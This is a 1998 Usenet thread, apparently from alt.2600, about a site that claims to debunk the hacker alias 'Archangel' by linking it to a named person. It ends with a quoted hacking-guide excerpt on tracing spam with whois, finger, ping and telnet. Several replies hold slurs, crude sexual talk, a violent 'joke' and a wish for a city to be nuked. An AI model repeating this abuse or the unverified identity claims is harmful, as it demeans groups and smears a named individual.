Announce: Archangel Debunked site
Jennifer Martino
Brian Jones wrote:
>
> Announcing the publication of "Archangel Debunked"
>
> For almost two years now the controversy surrounding Archangel has
> filled the Alt.2600 hierarchy. Now, there's a web page reviewing that entire
> history.
>
> http://newbie.darkridge.com
>
> * An entire timeline of almost every post made by Archangel since 7-07-96.
> * Trends in faked and forged posts made by Archangel.
> * Inconsistencies and mistakes missed by day to day reading.
> * Every ISP he has used and Garstecki.Net creation.
> * Incorrect information and reposting of text files as his own work.
>
Even though you are prolly gonna get a lotta flack for this page, I,
personally, would like to commend you. I have only skimmed the site, but
it seems rather through, well organized and very interesting reading.
And, you inadvertantly uncovered the fact that there is a consistency
with Dan Garstecki's misspelling. Originol and original. Take a look at
the "Duff's Keg" or whatever page.
--
Jennifer Martino
E-MAIL :
jmar...@ameritech.SPAM.THE.WONDER.WHAT.THE.HELL.IT.IS.MEAT.net
ICQ # : 6811820
WEB PAGE: "The Web Page You Have Reached"
http://www.ameritech.net/users/jmartino/index.html
Telephone sounds/recordings.
Over 125 sounds and growing!
Updated weekly!
Why not send the following people some spam? They seemed to think *I*
wouldn'd mind it.
gwanote...@ameritech.net, gwa...@aol.com, gw...@juno.com,
infob...@ameritech.net
Brian Jones
Announcing the publication of "Archangel Debunked"
For almost two years now the controversy surrounding Archangel has
filled the Alt.2600 hierarchy. Now, there's a web page reviewing that entire
history.
* An entire timeline of almost every post made by Archangel since 7-07-96.
* Trends in faked and forged posts made by Archangel.
* Inconsistencies and mistakes missed by day to day reading.
* Every ISP he has used and Garstecki.Net creation.
* Incorrect information and reposting of text files as his own work.
These are just a few of the things covered in this web site, which
is split into different sections and extreamly large.
The reason I created this page is two weeks ago I read alt.2600 for
the first time in over a year, and noticed the numerous Archangel threads. I
had a week off work, and nothing better to do, so I did a few searches on
Dejanews and started reading. I couldn't believe what I was seeing. Outright
forged posts being questioned by a few, dismissed by Archangel, and accepted
by the rest. I was amazed at the complex stories he wove explaining away his
past or ridiculing those who attacked him.
One post made a while ago impressed me, entitled "Why it is
important to expose Frauds in our community." That post is probably what
sparked the creation of the page.
I spent more time than I really should have, but in the end I had
a timeline of almost every post Archangel made, with the exception of his
Sprynet gap. Looking over his entire history, patterns became apparent that
left no doubt in my mind he is defiantly not who he says he is, and he does
not know what he says he knows.
Read the sections and learn what Archangel has been attempting to
hide. Read about me so you can understand my background, credibilities, and
why I created the page a little better. Then make your own decisions on the
matter. Reference the page in any way you like, copy sections from it,
mirror it, flame it, comment on it. But perhaps it will help clear up some
of the controversy.
I didn't make this to be a flame page, filled with little if any
information. Everything on the page is referenced, points to other
references, and shows how you can research it on your own. I created this
page because I feel it is wrong that he has been lying to Alt.2600 for so
long, and has been making himself appear to be a source of knowledge and
experience when in fact he appears to know very little, something which is
covered in one of the major sections on the web page.
Feel free to respond via email,
balif at darkridge dot com
@888.999.777.999 tip
In article <%JKK.129$Cl1.6...@nnrp2.ptd.net>,
Brian Jones <ba...@dada.darkridge.com> wrote:
>
> Announcing the publication of "Archangel Debunked"
>
> For almost two years now the controversy surrounding Archangel has
>filled the Alt.2600 hierarchy. Now, there's a web page reviewing that entire
>history.
>
> http://newbie.darkridge.com
holy shit! other than the fact he posted borrowed hacks (which this site
does go into), i never had anything against archangel.
but if i were archangel and saw this site, i'd be red in the face.
more detail went into this than any research paper i wrote at school. damn.
good work on the site i guess - only problem are several broken links.
laterz,
- tip
[ =-=-=-=-=-= preserve wildlife; pickle a squirrel today. =-=-=-=-=-= ]
[ *&$*&$* tip - my evil twin is pit - mailto:t...@qwerqwer.com *&$*&$* ]
[ & email is spam protected: replace "qwerqwer" with "stopsmiling" &* ]
[ %* food for the spam bots: j...@insomniapays.com ded1...@minn.net %* ]
[ % je...@bpsi.net mice...@whitepower.com webm...@whitepower.com %& ]
Brian Jones
tip <^&*%$ @888 .999 .777 .999 > wrote:
> more detail went into this than any research paper i wrote at school. damn.
> good work on the site i guess - only problem are several broken links.
Broken links where quickly noticed as I had a tail -f on the
access_log and fixed immediatly. Sorry about that, so many pages that a few
typo's screwed up a couple of links. Tell me if you encounter any more.
-Balif at darkridge dot net
cyber...@mail.com
whether you choose to beleive or not this site makes for very
interesting reading
On Mon, 02 Mar 1998 22:09:26 -0600, Jennifer Martino
<jmar...@ameritech.net> wrote:
>Brian Jones wrote:
>>
>> Announcing the publication of "Archangel Debunked"
>>
>> For almost two years now the controversy surrounding Archangel has
>> filled the Alt.2600 hierarchy. Now, there's a web page reviewing that entire
>> history.
>>
>> http://newbie.darkridge.com
>>
>> * An entire timeline of almost every post made by Archangel since 7-07-96.
>> * Trends in faked and forged posts made by Archangel.
>> * Inconsistencies and mistakes missed by day to day reading.
>> * Every ISP he has used and Garstecki.Net creation.
>> * Incorrect information and reposting of text files as his own work.
>>
>
Doppleganger
[SNIP]
>> For almost two years now the controversy surrounding Archangel has
>>filled the Alt.2600 hierarchy. Now, there's a web page reviewing that
entire
>>history.
>>
>> http://newbie.darkridge.com
>
>holy shit! other than the fact he posted borrowed hacks (which this site
>does go into), i never had anything against archangel.
>
>but if i were archangel and saw this site, i'd be red in the face.
>
no... i think that AA just don't give a fuck about it because he/che/it
probably know's who he/she/it is... by the way, when will you guys discover
that knowing who is who doesnt:
1) matter to anyone
2) give you any money
3) give you popularity.. ALL lamers are searching for who is AA
just face it : we don't know who is AA and we don't know YOU... nothing in
between is important but information on HACKING not HACKERS ! so why bother
anyway ?
d.
milligafbid (maybe i look like a give a fuck but i don't)
574
In article <6dhc4n$fjo$1...@titan.globalserve.net>, eh...@hehe.com.nospam
says...
and very well-done...overkill perhaps... :)
One of the most important things about information is the validity of it.
False information is useless. One of the best ways to determine the
validity of information that you yourself cannot verify is to determine
the validity of the source. If the source is bogus...the info may as
well be also.
Archangel pulled a lot of bonehead moves to market himself
(forgeries, embellishments, and outright lies)...and often contradicts
his own posts. Can you trust a source like that? Maybe newbies
can...but the rest of us can't. Because of this marketing ploy Arch has
made himself very very visible...something a true hacker does not
do...especially if still hacking..I cite devils night brags...
As far as I am concerned people can be whoever they want to be...this
field is full of egos, but don't cash a check you can't cover. You'll be
called on it...Arch was called...and his best response was "That has
been debated and settled and is no proof"...we hand him the signed
check...still not that is no proof...fight back with knowledge
Arch...show us you know more than newbie stuff...and this will die.
One last thought...if Arch is even part the hacker he says he is...and
still active...we'll find out soon enough because he'll get busted...he
is too visible...and too sloppy (I get this from the contradicting posts,
bad forgeries, and stupid questions he sometimes asks).
Hmmm...I'll bet the CIA does not teach it's agents or civilian personnel
to brag in public...especially about covert hacks behind an Iron Curtain
that is still very unstable...
Sorry Arch...I don't mean to attack you directly, but your goal of
getting into the spotlight put the burdon of proof for your claims in
your hands...
Anonymous
>Brian Jones wrote:
>>
>> Archangel Debunked at http://newbie.darkridge.com
>
> tip wrote:
> if i were archangel and saw this site, i'd be red in the face.
> more detail went into this than any research paper i wrote at school.
> damn. good work on the site
> - tip
Great site, Brian.
Keep us posted on any attempts at retaliation. Garstecki's got to have
at least a couple friends who really do know how to hack. Or maybe
he'll get some of his old CIA associates to take care of you, ha ha ha ha.
Mats
Archangel Debunked at http://newbie.darkridge.com
Doc Holiday
>
>
> Announcing the publication of "Archangel Debunked"
>
> For almost two years now the controversy surrounding Archangel has
>filled the Alt.2600 hierarchy. Now, there's a web page reviewing that entire
>history.
>
> http://newbie.darkridge.com
>
>* An entire timeline of almost every post made by Archangel since 7-07-96.
>* Trends in faked and forged posts made by Archangel.
>* Inconsistencies and mistakes missed by day to day reading.
>* Every ISP he has used and Garstecki.Net creation.
>* Incorrect information and reposting of text files as his own work.
>
Interesting reading, thank you
Doc Holiday
dungb...@hotmail.com
Nice site, Brian. For the first time, someone has finally organized
a conclusive history of the fraudulant Archangel. For those of you
who haven't seen the site, it is not just an expose of Archangel. It
is a well researched and documented timeline which outlines the methods
that Archangel has used to try to manipulate alt.2600 into thinking he
is the ultimate hacker. It is not just an "I know who Archangel is!"
type of site. I spent some time researching this a few months ago and
found basically the same thing, and so have several others. (like John,
Winter, etc.) However, this site has it documented for all to see. Now,
hopefully, you all won't think that all of our flames were unwarranted.
DungBeetle
-----== Posted via Deja News, The Leader in Internet Discussion ==-----
http://www.dejanews.com/ Now offering spam-free web-based newsreading
gabri...@hotmail.com
You may be right...in fact I agree...NO ONE cares! Perhaps that is why AA
continues to clog up bandwidth with his fantasies...hmmm...wait...there is
something that people do care about...sorting through all the AA crap that he
himself posts or posts to get attention or a reaction...
Regards,
Gabriel
In article <6dhc4n$fjo$1...@titan.globalserve.net>,
"Doppleganger" <eh...@hehe.com.nospam> wrote:
>
> [SNIP]
>
> >> For almost two years now the controversy surrounding Archangel has
> >>filled the Alt.2600 hierarchy. Now, there's a web page reviewing that
> entire
> >>history.
> >>
> >> http://newbie.darkridge.com
> >
> >holy shit! other than the fact he posted borrowed hacks (which this site
> >does go into), i never had anything against archangel.
> >
> >but if i were archangel and saw this site, i'd be red in the face.
> >
>
> no... i think that AA just don't give a fuck about it because he/che/it
> probably know's who he/she/it is... by the way, when will you guys discover
> that knowing who is who doesnt:
> 1) matter to anyone
> 2) give you any money
> 3) give you popularity.. ALL lamers are searching for who is AA
>
> just face it : we don't know who is AA and we don't know YOU... nothing in
> between is important but information on HACKING not HACKERS ! so why bother
> anyway ?
>
> d.
> milligafbid (maybe i look like a give a fuck but i don't)
>
>
JerryMalik
This site is very well organized and researched, but it is not conclusive. I
fail to see any theories proved. Whoever made this obviously has a purpose
but couldn't prove a single thing. It's sad people still waste time on this
topic.
dungb...@hotmail.com wrote:
> Nice site, Brian. For the first time, someone has finally organized
> a conclusive history of the fraudulant Archangel. For those of you
> who haven't seen the site, it is not just an expose of Archangel. It
> is a well researched and documented timeline which outlines the methods
> that Archangel has used to try to manipulate alt.2600 into thinking he
> is the ultimate hacker. It is not just an "I know who Archangel is!"
> type of site. I spent some time researching this a few months ago and
> found basically the same thing, and so have several others. (like John,
> Winter, etc.) However, this site has it documented for all to see. Now,
> hopefully, you all won't think that all of our flames were unwarranted.
>
> DungBeetle
>
surgica...@hotmail.com
I find it interesting that both Brian and Archangel are on
vacation at the same time.
Kidding.
Site is interesting and certainly not lacking in content.
Solid research, though at this point (IMHO) the evidence
provided is still inconclusive. All of this information has
been submitted to these ngs, but never before gathered in such
an orderly and methodical fashion. Further research may just
turn the tide.
Jennifer Martino
Doppleganger wrote:
>
> [SNIP]
>
> >> For almost two years now the controversy surrounding Archangel has
> >>filled the Alt.2600 hierarchy. Now, there's a web page reviewing that
> entire
> >>history.
> >>
> >> http://newbie.darkridge.com
> >
> >holy shit! other than the fact he posted borrowed hacks (which this site
> >does go into), i never had anything against archangel.
> >
> >but if i were archangel and saw this site, i'd be red in the face.
> >
>
> no... i think that AA just don't give a fuck about it because he/che/it
> probably know's who he/she/it is...
haha.. and still can look himself in the face in the morn?
> by the way, when will you guys discover
> that knowing who is who doesnt:
> 1) matter to anyone
haha... Then ask the however many people who have kept this alive for
however long (at least 4 months. Probably more.), including yourself,
why it is still going and going like the fucking energizer bunny.
> 2) give you any money
haha.. "I know who Archangel is. So send $1 to the 5 addresses below.. "
haha..
> 3) give you popularity.. ALL lamers are searching for who is AA
As for the popularity. I agree. But I think the lamers (or naive people)
are the people who just believe everything they are told.
> just face it : we don't know who is AA and we don't know YOU... nothing in
> between is important but information on HACKING not HACKERS !
Ummm... hahah... Information on hacking comes from hackers, not people
who just say they are hackers (not implying anyone in particular there.
Really. I'm not. I mean what I say and say what I mean...)
> so why bother
> anyway ?
> d.
> milligafbid (maybe i look like a give a fuck but i don't)
--
Ben Cantrick
In article <%JKK.129$Cl1.6...@nnrp2.ptd.net>,
What, no I mean, WHAT are you smoking?? Give me some?
2 years? 2 years ago people were flaming about "the Mitey Hawk"
trying to be "Modurator" of alt.2600. Don't flatter the guy, he's
a drop in the bucket. Hasn't been around more than 4 months, in
my estimation.
-Ben
--
Ben Cantrick (mac...@dim.com) | Yes, the BGC dubs still suck.
BGC Nukem: http://www.dim.com/~mackys/bgcnukem.html
The Spamdogs: http://www.dim.com/~mackys/spamdogs
http://soyokaze.biosci.ohio-state.edu/~gavigan/magnum.html
Richard S
Some people have *way* too much time on their hands. If you want to build
your own reputation by trying to tear down someone else's, might I suggest
a different hobby? I hear smoking crack is pretty cool...
Why don't you dedicate your time to something more productive?
= Richard S =
Smokebowl
I must say I have been working on a prject here, and haven't been
able to read these groups much but I was emailed the link and just had
to come on here to Laugh in Public.
I thought it was totally hilarious, I cant wait until archangel has
some sort of response for this, Watch it, you might get the dreaded
Archangel roolz Virus, now that can be a real bitch..hahaha
its a trojan, but he didnt program it, but he did program it, but
L0pht heavy indrustries programmed it, but he doesn;t know anything
about trojans...wow... Maybe he is a politician?
On Tue, 03 Mar 1998 21:21:24 GMT, doc_h...@geocities.com (Doc
Holiday) wrote:
>On Tue, 03 Mar 1998 03:24:43 GMT, Brian Jones
><ba...@dada.darkridge.com> wrote:
>
>>
>>
>> Announcing the publication of "Archangel Debunked"
>>
>> For almost two years now the controversy surrounding Archangel has
>>filled the Alt.2600 hierarchy. Now, there's a web page reviewing that entire
>>history.
>>
>> http://newbie.darkridge.com
>>
nyarl-tep
= Richard S = says
"If you want to build
your own reputation by trying to tear down someone else's, might I suggest
a different hobby? "
-------
i think you missed the point of a well put together site
-------------
"I hear smoking crack is pretty cool..."
-----------------
and you heard this from who?
the toothless crack whores you slay rape
then dump in a shallow grave after dismembering them with a rusty
butterknife
Penult
On 4 Mar 1998 07:01:50 GMT, "nyarl-tep" <nyarla...@bigfoot.com>
wrote:
>= Richard S = says
>
> "I hear smoking crack is pretty cool..."
>-----------------
>and you heard this from who?
>the toothless crack whores you slay rape
>then dump in a shallow grave after dismembering them with a rusty
>butterknife
>
i know for a fact his butter knife is NOT rusty!
BTW smoking crack is cool....the problem is the after effects which
kill you dead!
furthermore she had a tooth....
ah fuck it....some people will never get it
root
The next day U find amazing shit in your machine!!!!!
PS And yhink;I only tried to do it drunk.....
Harlequin
On Tue, 03 Mar 1998 20:25:02 -0600, Jennifer Martino wrote:
>Doppleganger wrote:
>> >> For almost two years now the controversy surrounding Archangel has
>> >>filled the Alt.2600 hierarchy. Now, there's a web page reviewing that entire
>> >>history.
>> >
>> >does go into), i never had anything against archangel.
>> >
>> >but if i were archangel and saw this site, i'd be red in the face.
>>
>> no... i think that AA just don't give a fuck about it because he/che/it
>> probably know's who he/she/it is...
>> just face it : we don't know who is AA and we don't know YOU... nothing in
>> between is important but information on HACKING not HACKERS !
>
>Ummm... hahah... Information on hacking comes from hackers, not people
>who just say they are hackers (not implying anyone in particular there.
>Really. I'm not. I mean what I say and say what I mean...)
Archangel has posted some useful information on hacking. I learned
quite a bit from him, and his posts have also had an influence on the
style and content of my own contributions (including my posts for
newbies).
H.
Winter
574 (5...@nowhere.com) wrote:
: Hmmm...I'll bet the CIA does not teach it's agents or civilian personnel
: that is still very unstable...
No gov't agency encourages making a spectacle on oneself. Most disapprove
highly of it.
Winter
Horse
Excellent site.
Maybe It`ll put an end to all this crap.
arch...@l0pht.com
In article <6dn7qj$dbv$1...@nclient3-gui.server.virgin.net>,Give me a break. That site was designed to start threads and flamewars. Let's
say the site is 100% true,(ha-ha), and I am this 13 year old Congressman,
fraud, mentally challenged, foul mouthed, spammer, rock 'n roller, con artist
that talks to himself. Even if that were all true, So what?
The newsgroups were too quiet. Someone was bound to attack me again.
I tried to stop this flamewar before it started, remember?
Archangel
Wrath of God Hand Delivered
http://l0pht.com/~archangl
eh...@hehe.com
> haha... Then ask the however many people who have kept this alive for
> however long (at least 4 months. Probably more.), including yourself,
> why it is still going and going like the fucking energizer bunny.
you aRE FUCKING RIGHT... I will shut this frustration down, and shut tha fuck
up, so maybe thais way, other like me will shut their fuck up
d.
sorry to bother you
gabri...@hotmail.com
Seems to me, if I recall, you started it....Go away little man.
Regards,
Gabriel
In article <6do4dk$r3e$1...@nnrp1.dejanews.com>,
arch...@l0pht.com wrote:
>
> In article <6dn7qj$dbv$1...@nclient3-gui.server.virgin.net>,
> "Horse" <Ho...@hotmail.com> wrote:
> >
> > Excellent site.
> >
> > Maybe It`ll put an end to all this crap.
> >
> Give me a break. That site was designed to start threads and flamewars.
Let's
> say the site is 100% true,(ha-ha), and I am this 13 year old Congressman,
> fraud, mentally challenged, foul mouthed, spammer, rock 'n roller, con
artist
> that talks to himself. Even if that were all true, So what?
>
> The newsgroups were too quiet. Someone was bound to attack me again.
> I tried to stop this flamewar before it started, remember?
> Archangel
> Wrath of God Hand Delivered
> http://l0pht.com/~archangl
>
Kevin
Hey burnt out shit for brains...put the crack pipe down and wake up. Arch has
more fumunda cheese (from under his balls) than you will EVER have brains.
Jesus! Now you need to go back and whip the shit outta of your parents for
conceiving you while dropping acid and rasing you in a toxic waste dump! `Course
then again, what do you expect form a 15 year old mongaloid. Go back to the
alt.let_me_suck_off_yer_poodle_while_the_cocker_fucks_me_in_the_ass NG where you
belong!
Oh and be sure to counter with one of those real spiffy "I am sooo much smarter
than you, I was programming in abacus before you were born" replys you dickless
wonder!
No wonder they call it DOPE!!!
Smokebowl wrote:
> I must say I have been working on a prject here, and haven't been
> able to read these groups much but I was emailed the link and just had
> to come on here to Laugh in Public.
>
> I thought it was totally hilarious, I cant wait until archangel has
> some sort of response for this, Watch it, you might get the dreaded
> Archangel roolz Virus, now that can be a real bitch..hahaha
>
> its a trojan, but he didnt program it, but he did program it, but
> L0pht heavy indrustries programmed it, but he doesn;t know anything
> about trojans...wow... Maybe he is a politician?
>
> On Tue, 03 Mar 1998 21:21:24 GMT, doc_h...@geocities.com (Doc
> Holiday) wrote:
>
> >On Tue, 03 Mar 1998 03:24:43 GMT, Brian Jones
> ><ba...@dada.darkridge.com> wrote:
> >
> >>
> >>
> >> Announcing the publication of "Archangel Debunked"
> >>
> >> For almost two years now the controversy surrounding Archangel has
> >>filled the Alt.2600 hierarchy. Now, there's a web page reviewing that entire
> >>history.
> >>
undo
Kevin wrote:
>
> Hey burnt out shit for brains...put the crack pipe down and wake up. Arch has
> more fumunda cheese (from under his balls)
I'll take your word for it.
Brian Jones
Mercenary PGP ROT 13 <gnp...@vpbz.VFHPX.arg> wrote:
>>Hey burnt out shit for brains...put the crack pipe down and wake up. Arch has
> How exactly did you acquire this information?
<JOKE>
Could Archangel be attacking my "slightly homophobic" site because
he does, in fact, have slightly homosexual tendancies?
</JOKE>
Sorry, couldn't resist
---
Balif
fast...@usa.net
Well... it was fun while the party lasted.
See y'all back on alt.2600
G.
Penult
On Wed, 11 Mar 1998 07:03:54 GMT, gnp...@vpbz.VFHPX.arg (Mercenary
PGP ROT 13) wrote:
>Kevin <smokebowltak...@cyber.proaxis.com> wrote:
>
>>Hey burnt out shit for brains...put the crack pipe down and wake up. Arch has
>>more fumunda cheese (from under his balls) than you will EVER have brains.
>
>How exactly did you acquire this information?
>
>
>Mercenary PGP
>Wrath of The Soldier Hand Delivered
Really, I was wondering, too.
BTW May I borrow you "Keywords"? If those don't raise attention and
set off alarms NOTHING ever will!
nyarl-tep
is there a problem with being gay?
i live in a lesiban commune
you want to tell me to my face there is a problem with gays?
i think not cause from the safety of your keyboard you may say what you
wish
but in real life you would smile and wish no offence
arch...@l0pht.com
In article <dQqN.263$Na.6...@nnrp1.ptd.net>,
Brian Jones <ba...@dada.darkridge.com> wrote:
>
> Mercenary PGP ROT 13 <gnp...@vpbz.VFHPX.arg> wrote:
> >>Hey burnt out shit for brains...put the crack pipe down and wake up. Arch
has
> >>more fumunda cheese (from under his balls) than you will EVER have brains.
>
> > How exactly did you acquire this information?
>
> Could Archangel be attacking my "slightly homophobic" site because
> he does, in fact, have slightly homosexual tendancies?
> </JOKE>
>
> Sorry, couldn't resist
>
> ---
> Balif
>
You're a REAL piece of work, Brian.
Archangel
undo
A lesbian commune? Damn, I could go for that. Sounds like a harum in
the making >:
Pen...@null.device.dumpster
On Thu, 12 Mar 1998 03:38:43 GMT, gnp...@vpbz.VFHPX.arg (Mercenary
PGP ROT 13) wrote:
>Penult wrote:
>>BTW May I borrow you "Keywords"? If those don't raise attention and
>>set off alarms NOTHING ever will!
>
>Someone really does read message headers. Sure, you may use any
>information in my headers for any reasonable use.
hehehe I never did until AA got busted for his "mutli-forgeries".
Thanx for your permission, your Keywords will be used and in return
let me offer this to add to your collection-----> C-4
BATF shits when they see that!
bORDERS
We don't care if your queer so don't bring it up.
Desperado
undo <un...@wait.backkkup.net> wrote in article
<35077C27...@wait.backkkup.net>...
> nyarl-tep wrote:
> >
> > is there a problem with being gay?
> > i live in a lesiban commune
> > you want to tell me to my face there is a problem with gays?
> > i think not cause from the safety of your keyboard you may say what you
> > wish
> > but in real life you would smile and wish no offence
>
> A lesbian commune? Damn, I could go for that. Sounds like a harum in
> the making >:
I was thinking the EXACT same thing, Undo....
Hey Nyarl............................... Are they taking applications?
Desp
nyarl-tep
lets get something nice and sparkling clear
shall we?
lesbian means no men in side that pussy
no fingers tongues or noses belonging to creatures with dicks poking the
cooter
my girlfriend and i are the only straight people living here
that is because we do not have that childish attitude most
who dont understand do
if you think 200 lb leather jacket wearing motocycle driving ex-state cop
wood shop working
clam lapping 50 yr old women are your idea of a "harum" then help yourself
to a come on
there is a waiting list for the place
15 foot high ceilings hard wood floors exposed brick walls freight elevator
8x5 foot windows
120 year old loft building on a dead end street loading dock plenty of
parking
Tech33
On Thu, 12 Mar 1998 07:22:59 -0500, bORDERS <no-...@juno.com> wrote:
>We don't care if your queer so don't bring it up.
>
>nyarl-tep wrote:
>
>> is there a problem with being gay?
>> i live in a lesiban commune
>> you want to tell me to my face there is a problem with gays?
>> i think not cause from the safety of your keyboard you may say what you
>> wish
>> but in real life you would smile and wish no offence
>
>
>
Please pay attention to whom you are replying. Nyarl-tep was asking
that question because of a smartassed comment by Brian.
That said, nyarl could have just stopped with the question. Although,
knowing a bit more about her is nice in case we ever have to figure
out whether she's a Senator or not. ;c)
Tech33
--
SSG Christopher G. Campbell
Network Administrator, OSDC3I(I&S)
Official: camp...@osd.pentagon.mil
Personal: camp...@citizenet.com
Tech33 on the UnderNet IRC Network
Pen...@null.device.dumpster
On 12 Mar 1998 14:34:10 GMT, "Desperado" <the_de...@hotmail.com>
wrote:
>
>
>undo <un...@wait.backkkup.net> wrote in article
><35077C27...@wait.backkkup.net>...
>> nyarl-tep wrote:
>> >
>> > is there a problem with being gay?
>> > i live in a lesiban commune
>> > you want to tell me to my face there is a problem with gays?
>> > i think not cause from the safety of your keyboard you may say what you
>> > wish
>> > but in real life you would smile and wish no offence
>>
>> A lesbian commune? Damn, I could go for that. Sounds like a harum in
>> the making >:
>
>I was thinking the EXACT same thing, Undo....
>
>Hey Nyarl............................... Are they taking applications?
>
>Desp
Lesbians AND they like computers?
ME TOO!!!!
nyarl-tep
borders i will bring it up
i am not "queer" as you put it
i am a man
jessica is a woman
for those too fucking stupid to figure it out
one account may = many users
now borders you have a problem with gays?
how bout hackers who are gay?
i know plenty
tell you what
that worm you call a dick between you legs does not make you a man
rather that which is between your ears
there i find you gravely lacking
and there upon your grave shall i defacate
jessica and i are your betters mentally physically and spiritually
you are as a newborn babe
i am as the august sage
Tech thirty three(respect,yet)
there is no way to tell who i am
none at all
you may never know who types these lines
unless you see me doing it
and even then it takes years to really know a human being
HUMANIODS wallow in your petty bigotry
live your sad lives with the solace of morals programmed into you
i love the sour smell of rotting minds
grey matter curdled by christ and guilt
in this world of fools i am the king of jesters
try to find my soul in your hell
nyarl-tep
and they like your willing toothless gullet
undo
nyarl-tep wrote:
>
> borders i will bring it up
> i am not "queer" as you put it
> i am a man
> jessica is a woman
I am confused now, so I will attempt to decipher this.
> for those too fucking stupid to figure it out
> one account may = many users
ok.
> now borders you have a problem with gays?
> how bout hackers who are gay?
> i know plenty
> tell you what
> that worm you call a dick between you legs does not make you a man
I have reached a conclusion: You are a woman. Men do not talk about
each other's dicks. So, since you say that you are a man, I deduce that
that means that you are "the man" in your relationship.
> rather that which is between your ears
> there i find you gravely lacking
> and there upon your grave shall i defacate
> jessica and i are your betters mentally physically and spiritually
"We are woman ..."
> you are as a newborn babe
> i am as the august sage
> Tech thirty three(respect,yet)
> there is no way to tell who i am
> none at all
> you may never know who types these lines
> unless you see me doing it
Don't you mean, "unless you see that person doing it"? Or do you mean
that we can see you typing and only then be able to know who is typing
and that it may be someone *besides* you? I'm confused again.
> and even then it takes years to really know a human being
> HUMANIODS wallow in your petty bigotry
> live your sad lives with the solace of morals programmed into you
> i love the sour smell of rotting minds
> grey matter curdled by christ and guilt
> in this world of fools i am the king of jesters
> try to find my soul in your hell
Lesbian commune. Many women == many words.
undo
Baaaaby!!! I'm on my way. I love women who do wood work.
Penult
On Fri, 13 Mar 1998 05:07:40 GMT, gnp...@vpbz.VFHPX.arg (Mercenary
PGP ROT 13) wrote:
>"nyarl-tep" <nyarla...@bigfoot.com> wrote:
<snip> rantings and ravings
>
>Sheesh, you sound like one of those sucky christians. I like gays
>because are the solution to the world's overpopulation problem.
>Mercenary PGP
>Wrath of The Soldier Hand Delivered
Now now now. Remember what AA said "stay away from combustable
material"!
I was very happy to see "C-4" in your Keywords and just wanted
everyone to know that it is readily available @
Garstecki.net/halloween/hellnight/pranks/littleboom/
Penult
On Fri, 13 Mar 1998 01:29:12 -0500, undo <un...@wait.backkkup.net>
wrote:
>nyarl-tep wrote:
>
>> if you think 200 lb leather jacket wearing motocycle driving ex-state cop
>> wood shop working
>> clam lapping 50 yr old women are your idea of a "harum" then help yourself
I saw that, dude, on Jerry Springer! (in my best Tommy Chong voice)
VICKY
ME LLAMO VICKY Y QUIERO UN LIGUE
eh...@hehe.com escribió en artículo <6dun35$66m$1...@nnrp1.dejanews.com>...
>
> > haha... Then ask the however many people who have kept this alive for
> > however long (at least 4 months. Probably more.), including yourself,
> > why it is still going and going like the fucking energizer bunny.
>
> you aRE FUCKING RIGHT... I will shut this frustration down, and shut tha
fuck
> up, so maybe thais way, other like me will shut their fuck up
>
> d.
> sorry to bother you
>
Adam Stouffer
Mercenary PGP ROT 13 wrote:
>
> Sheesh, you sound like one of those sucky christians. I like gays
> because are the solution to the world's overpopulation problem.
I am hoping for a big ass war to lower it. I wish new york city would
get nuked.
Adam
--
__________________________
| Remove the NO-SPAM |
__________________________
Smaug
Im going to get major spam after today, aren't i... shit.
---
_______________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 1 Number 5
It's vigilante phun day again! How get email spammers kicked off their ISPs.
_______________________________________________________
So, have you been out on Usenet blasting spammers? It's phun, right?
But if you have ever done much posting to Usenet news groups, you will
notice that soon after you post, you will often get spam email. This is
mostly thanks to Lightning Bolt, a program written by Jeff Slayton to strip
huge volumes of email addresses from Usenet posts.
Here's one I recently got:
Received: from mail.gnn.com (70.los-angeles-3.ca.dial-access.att.net
[165.238.38.70]) by mail-e2b-service.gnn.com (8.7.1/8.6.9) with SMTP id
BAA14636; Sat, 17 Aug 1996 01:55:06 -0400 (EDT)
Date: Sat, 17 Aug 1996 01:55:06 -0400 (EDT)
Message-Id: <1996081705...@mail-e2b-service.gnn.com>
To:
Subject: Forever
From: FR...@Heaven.com
"FREE" House and lot in "HEAVEN"
Reserve yours now, do it today, do not wait. It is FREE
just for the asking. You receive a Personalized Deed and detailed Map to
your home in HEAVEN. Send your name and address along with a one time
minimum donation of $1.98 cash, check, or money order to
help cover s/h cost
TO: Saint Peter's Estates
P.O. Box 9864
Bakersfield,CA 93389-9864
This is a gated community and it is "FREE".
Total satisfaction for 2 thousand years to date.
>From the Gate Keeper. (PS. See you at the Pearly Gates)
GOD will Bless you.
Now it is a pretty good guess that this spam has a forged header. To
identify the culprit, we employ the same command that we used with Usenet spam:
whois heaven.com
We get the answer:
Time Warner Cable Broadband Applications (HEAVEN-DOM)
2210 W. Olive Avenue
Burbank, CA 91506
Domain Name: HEAVEN.COM
Administrative Contact, Technical Contact, Zone Contact, Billing Contact:
Melo, Michael (MM428) mic...@HEAVEN.COM
(818) 295-6671
Record last updated on 02-Apr-96.
Record created on 17-Jun-93.
Domain servers in listed order:
CHEX.HEAVEN.COM 206.17.180.2
NOC.CERF.NET 192.153.156.22
>From this we conclude that this is either genuine (fat chance) or a better
forgery than most. So let's try to finger FR...@heaven.com.
First, let's check out the return email address:
finger FR...@heaven.com
We get:
[heaven.com]
finger: heaven.com: Connection timed out
There are several possible reasons for this. One is that the systems
administrator for heaven.com has disabled the finger port. Another is that
heaven.com is inactive. It could be on a host computer that is turned off,
or maybe just an orphan.
*********************
Newbie note: You can register domain names without setting them up on a
computer anywhere. You just pay your money and Internic, which registers
domain names, will put it aside for your use. However, if you don't get it
hosted by a computer on the Internet within a few weeks, you may loose your
registration.
*********************
We can test these hypotheses with the ping command. This command tells you
whether a computer is currently hooked up to the Internet and how good its
connection is.
Now ping, like most kewl hacker tools, can be used for either information or
as a means of attack. But I am going to make you wait in dire suspense for a
later Guide to (mostly) Harmless Hacking to tell you how some people use
ping. Besides, yes, it would be *illegal* to use ping as a weapon.
Because of ping's potential for mayhem, your shell account may have disabled
the use of ping for the casual user. For example, with my ISP I have to go
to the right directory to use it. So I give the command:
/usr/etc/ping heaven.com
The result is:
heaven.com is alive
***********************
Technical Tip: On some versions of Unix,giving the command "ping" will start
your computer pinging the target over and over again without stopping. To
get out of the ping command, hold down the control key and type "c". And be
patient, next Guide to (mostly) Harmless Hacking will tell you more about
the serious hacking uses of ping.
***********************
Well, this answer means heaven.com is hooked up to the Internet right now.
Does it allow logins? We test this with:
telnet heaven.com
This should get us to a screen that would ask us to give user name and
password. The result is:
Trying 198.182.200.1 ...
telnet: connect: Connection timed out
OK, now we know that people can't remotely log in to heaven.com. So it sure
looks as if it was an unlikely place for the author of this spam to have
really sent this email.
